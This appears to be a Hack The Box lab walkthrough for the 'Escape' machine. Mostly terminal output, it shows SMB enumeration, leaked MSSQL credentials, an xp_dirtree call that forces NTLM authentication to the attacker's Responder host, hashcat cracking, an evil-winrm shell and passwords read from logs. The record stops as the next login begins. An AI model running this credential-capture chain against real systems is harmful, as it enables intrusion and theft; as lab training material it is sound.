HTB Escape done
Escape
OS:
Windows
Technology:
MSSQL
IP Address:
10.10.11.202
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 16:59:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
57139/tcp open msrpc Microsoft Windows RPC
Users and pass:
Read from pdf file: SQL Server Procedures.pdf
Usernames:
Ryan
Tom
Brandon
___
Domain:
sequel.htb
___
Email:
[email protected]
___
Default creds to login database:
L: PublicUser
P: GuestUserCantWrite1
---
Cracked NTLM hash for user sql_svc (hascat)
L: sql_svc
P: REGGIE1234ronnie
---
After read logs from C:\SQLServer\Logs\errorlogs.bak
L: Ryan.Cooper
P: NuclearMosquito3
---
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.202_nmap 10.10.11.202 ; cat 10.10.11.202_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 10:57 CEST
Nmap scan report for 10.10.11.202
Host is up (0.068s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-02 16:59:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:55+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:54+00:00; +7h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:55+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-04-02T17:00:54+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
57139/tcp open msrpc Microsoft Windows RPC
Enumerate SMB
──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ smbclient -U anonymous -N -L //10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ smbclient -U anonymous -N //10.10.11.202/Public
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1464238 blocks available
smb: \> mget SQL Server Procedures.pdf
NT_STATUS_NO_SUCH_FILE listing \SQL
smb: \> mget "SQL Server Procedures.pdf"
Get file SQL Server Procedures.pdf? y
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (218.0 KiloBytes/sec) (average 218.0 KiloBytes/sec)
smb: \> exit
Read pdf file: SQL Server Procedures.pdf
We found interesting things:
Usernames:
Ryan
Tom
Brandon
___
Domain:
sequel.htb
___
Email:
[email protected]
___
Default creds to login database:
L: PublicUser
P: GuestUserCantWrite1
Connect to the MSSQL - impacket - mssqlclient.py
Use impacket
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ python3 /home/kali/.local/bin/mssqlclient.py sequel.htb/PublicUser:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL>
Find working stored procedures - MSSQL
https://book.hacktricks.xyz/pentesting-web/sql-injection/mssql-injection?source=post_page-----931dba100509--------------------------------#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures
---
I use stored procedures: xp_dirtree and responder to get NTLM hash
SQL> xp_dirtree '\\10.10.14.2\fake_folder'
subdirectory depth
------------ -----
SQL>
___
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ sudo responder -I tun0 -wv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.2]
Responder IPv6 [dead:beef:2::1000]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-CT68IVJWPQI]
Responder Domain Name [HLTQ.LOCAL]
Responder DCE-RPC Port [47825]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:29b37024217a7d20:9722ACB71DD42BBF1F018B3FD9AA3BBC:010100000000000000B1CCB10A85DA013EE93A4BDB67BBCA000000000200080048004C005400510001001E00570049004E002D004300540036003800490056004A00570050005100490004003400570049004E002D004300540036003800490056004A0057005000510049002E0048004C00540051002E004C004F00430041004C000300140048004C00540051002E004C004F00430041004C000500140048004C00540051002E004C004F00430041004C000700080000B1CCB10A85DA0106000400020000000800300030000000000000000000000000300000BBE82BB910BBA271C98DBF6669064BCBD3E762B57220B91F1E4ECF9042A4A8600A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000
Cracking NTLM hash for user sql_svc
Password cracked for user
L: sql_svc
P: REGGIE1234ronnie
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ hashcat NTLM_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 4782/9628 MB (2048 MB allocatable), 6MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f018b3fd9aa3bbc:010100000000000000b1ccb10a85da013ee93a4bdb67bbca000000000200080048004c005400510001001e00570049004e002d004300540036003800490056004a00570050005100490004003400570049004e002d004300540036003800490056004a0057005000510049002e0048004c00540051002e004c004f00430041004c000300140048004c00540051002e004c004f00430041004c000500140048004c00540051002e004c004f00430041004c000700080000b1ccb10a85da0106000400020000000800300030000000000000000000000000300000bbe82bb910bba271c98dbf6669064bcbd3e762b57220b91f1e4ecf9042a4a8600a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0032000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f...000000
Time.Started.....: Tue Apr 2 14:38:00 2024 (7 secs)
Time.Estimated...: Tue Apr 2 14:38:07 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1581.9 kH/s (2.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10702848/14344385 (74.61%)
Rejected.........: 0/10702848 (0.00%)
Restore.Point....: 10696704/14344385 (74.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: RICARDO7 -> RBRADLEY
Hardware.Mon.#1..: Util: 76%
Started: Tue Apr 2 14:37:55 2024
Stopped: Tue Apr 2 14:38:09 2024
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ hashcat NTLM_hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
SQL_SVC::sequel:29b37024217a7d20:9722acb71dd42bbf1f018b3fd9aa3bbc:010100000000000000b1ccb10a85da013ee93a4bdb67bbca000000000200080048004c005400510001001e00570049004e002d004300540036003800490056004a00570050005100490004003400570049004e002d004300540036003800490056004a0057005000510049002e0048004c00540051002e004c004f00430041004c000300140048004c00540051002e004c004f00430041004c000500140048004c00540051002e004c004f00430041004c000700080000b1ccb10a85da0106000400020000000800300030000000000000000000000000300000bbe82bb910bba271c98dbf6669064bcbd3e762b57220b91f1e4ecf9042a4a8600a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0032000000000000000000:REGGIE1234ronnie
Establish a remote connection - sql_svc
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
sequel\sql_svc S-1-5-21-4078382237-1492182817-2568127209-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read Errorlogs.bak
We see a new username: Ryan.Cooper with password
L: Ryan.Cooper
P: NuclearMosquito3
Read errorlogs.bak from home folder SQLServer
___
*Evil-WinRM* PS C:\Users\sql_svc> cd ../../
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
*Evil-WinRM* PS C:\> cd SQLServer
*Evil-WinRM* PS C:\SQLServer> dir
Directory: C:\SQLServer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\SQLServer> cd Logs
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server All rights reserved.
2022-11-18 13:43:05.97 Server Server process ID is 3788.
2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server Authentication mode is MIXED.
2022-11-18 13:43:05.97 Server Logging SQL Server messages in file 'C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG'.
2022-11-18 13:43:05.97 Server The service account is 'NT Service\MSSQL$SQLMOCK'. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Registry startup parameters:
-d C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\master.mdf
-e C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\Log\ERRORLOG
-l C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf
2022-11-18 13:43:05.97 Server Command Line Startup Parameters:
-s "SQLMOCK"
-m "SqlSetup"
-Q
-q "SQL_Latin1_General_CP1_CI_AS"
-T 4022
-T 4010
-T 3659
-T 3610
-T 8015
2022-11-18 13:43:05.97 Server SQL Server detected 1 sockets with 1 cores per socket and 1 logical processors per socket, 1 total logical processors; using 1 logical processors based on SQL Server licensing. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server SQL Server is starting at normal priority base (=7). This is an informational message only. No user action is required.
2022-11-18 13:43:05.97 Server Detected 2046 MB of RAM. This is an informational message; no user action is required.
2022-11-18 13:43:05.97 Server Using conventional memory in the memory manager.
2022-11-18 13:43:05.97 Server Page exclusion bitmap is enabled.
2022-11-18 13:43:05.98 Server Buffer Pool: Allocating 262144 bytes for 166158 hashPages.
2022-11-18 13:43:06.01 Server Default collation: SQL_Latin1_General_CP1_CI_AS (us_english 1033)
2022-11-18 13:43:06.04 Server Buffer pool extension is already disabled. No action is necessary.
2022-11-18 13:43:06.06 Server Perfmon counters for resource governor pools and groups failed to initialize and are disabled.
2022-11-18 13:43:06.07 Server Query Store settings initialized with enabled = 1,
2022-11-18 13:43:06.07 Server This instance of SQL Server last reported using a process ID of 5116 at 11/18/2022 1:43:04 PM (local) 11/18/2022 9:43:04 PM (UTC). This is an informational message only; no user action is required.
2022-11-18 13:43:06.07 Server Node configuration: node 0: CPU mask: 0x0000000000000001:0 Active CPU mask: 0x0000000000000001:0. This message provides a description of the NUMA configuration for this computer. This is an informational message only. No user action is required.
2022-11-18 13:43:06.07 Server Using dynamic lock allocation. Initial allocation of 2500 Lock blocks and 5000 Lock Owner blocks per node. This is an informational message only. No user action is required.
2022-11-18 13:43:06.08 Server In-Memory OLTP initialized on lowend machine.
2022-11-18 13:43:06.08 Server The maximum number of dedicated administrator connections for this instance is '1'
2022-11-18 13:43:06.09 Server [INFO] Created Extended Events session 'hkenginexesession'
2022-11-18 13:43:06.09 Server Database Instant File Initialization: disabled. For security and performance considerations see the topic 'Database Instant File Initialization' in SQL Server Books Online. This is an informational message only. No user action is required.
2022-11-18 13:43:06.10 Server CLR version v4.0.30319 loaded.
2022-11-18 13:43:06.10 Server Total Log Writer threads: 1. This is an informational message; no user action is required.
2022-11-18 13:43:06.13 Server Database Mirroring Transport is disabled in the endpoint configuration.
2022-11-18 13:43:06.13 Server clflushopt is selected for pmem flush operation.
2022-11-18 13:43:06.14 Server Software Usage Metrics is disabled.
2022-11-18 13:43:06.14 spid9s Warning ******************
2022-11-18 13:43:06.36 spid9s SQL Server started in single-user mode. This an informational message only. No user action is required.
2022-11-18 13:43:06.36 Server Common language runtime (CLR) functionality initialized using CLR version v4.0.30319 from C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.
2022-11-18 13:43:06.37 spid9s Starting up database 'master'.
2022-11-18 13:43:06.38 spid9s The tail of the log for database master is being rewritten to match the new sector size of 4096 bytes. 2048 bytes at offset 419840 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\mastlog.ldf will be written.
2022-11-18 13:43:06.39 spid9s Converting database 'master' from version 897 to the current version 904.
2022-11-18 13:43:06.39 spid9s Database 'master' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.40 spid9s Database 'master' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.41 spid9s Database 'master' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.52 spid9s Database 'master' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:06.72 spid9s SQL Server Audit is starting the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.72 spid9s SQL Server Audit has started the audits. This is an informational message. No user action is required.
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s Password policy update was successful.
2022-11-18 13:43:06.76 spid14s The resource database build version is 15.00.2000. This is an informational message only. No user action is required.
2022-11-18 13:43:06.78 spid9s The tail of the log for database msdb is being rewritten to match the new sector size of 4096 bytes. 3072 bytes at offset 50176 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\MSDBLog.ldf will be written.
2022-11-18 13:43:06.78 spid9s Converting database 'msdb' from version 897 to the current version 904.
2022-11-18 13:43:06.78 spid9s Database 'msdb' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.79 spid14s Starting up database 'model'.
2022-11-18 13:43:06.79 spid9s Database 'msdb' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.80 spid14s The tail of the log for database model is being rewritten to match the new sector size of 4096 bytes. 512 bytes at offset 73216 in file C:\Program Files\Microsoft SQL Server\MSSQL15.SQLMOCK\MSSQL\DATA\modellog.ldf will be written.
2022-11-18 13:43:06.80 spid9s Database 'msdb' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.81 spid14s Converting database 'model' from version 897 to the current version 904.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 897 to version 898.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.81 spid14s Database 'model' running the upgrade step from version 898 to version 899.
2022-11-18 13:43:06.81 spid9s Database 'msdb' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.82 spid14s Database 'model' running the upgrade step from version 899 to version 900.
2022-11-18 13:43:06.88 spid18s A self-generated certificate was successfully loaded for encryption.
2022-11-18 13:43:06.88 spid18s Server local connection provider is ready to accept connection on [ \\.\pipe\SQLLocal\SQLMOCK ].
2022-11-18 13:43:06.88 spid18s Dedicated administrator connection support was not started because it is disabled on this edition of SQL Server. If you want to use a dedicated administrator connection, restart SQL Server using the trace flag 7806. This is an informational message only. No user action is required.
2022-11-18 13:43:06.88 spid18s SQL Server is now ready for client connections. This is an informational message; no user action is required.
2022-11-18 13:43:06.88 Server SQL Server is attempting to register a Service Principal Name (SPN) for the SQL Server service. Kerberos authentication will not be possible until a SPN is registered for the SQL Server service. This is an informational message. No user action is required.
2022-11-18 13:43:06.88 spid14s Database 'model' running the upgrade step from version 900 to version 901.
2022-11-18 13:43:06.89 Server The SQL Server Network Interface library could not register the Service Principal Name (SPN) [ MSSQLSvc/dc.sequel.htb:SQLMOCK ] for the SQL Server service. Windows return code: 0x2098, state: 15. Failure to register a SPN might cause integrated authentication to use NTLM instead of Kerberos. This is an informational message. Further action is only required if Kerberos authentication is required by authentication policies and if the SPN has not been manually registered.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 901 to version 902.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:06.89 spid14s Database 'model' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.00 spid14s Clearing tempdb database.
2022-11-18 13:43:07.06 spid14s Starting up database 'tempdb'.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 902 to version 903.
2022-11-18 13:43:07.17 spid9s Database 'msdb' running the upgrade step from version 903 to version 904.
2022-11-18 13:43:07.29 spid9s Recovery is complete. This is an informational message only. No user action is required.
2022-11-18 13:43:07.30 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.30 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.33 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default language' changed from 0 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'default full-text language' changed from 1033 to 1033. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.34 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'user instances enabled' changed from 1 to 1. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.39 spid51 Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
*Evil-WinRM* PS C:\SQLServer\Logs>
Establish a remote connection - Ryan.Cooper
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
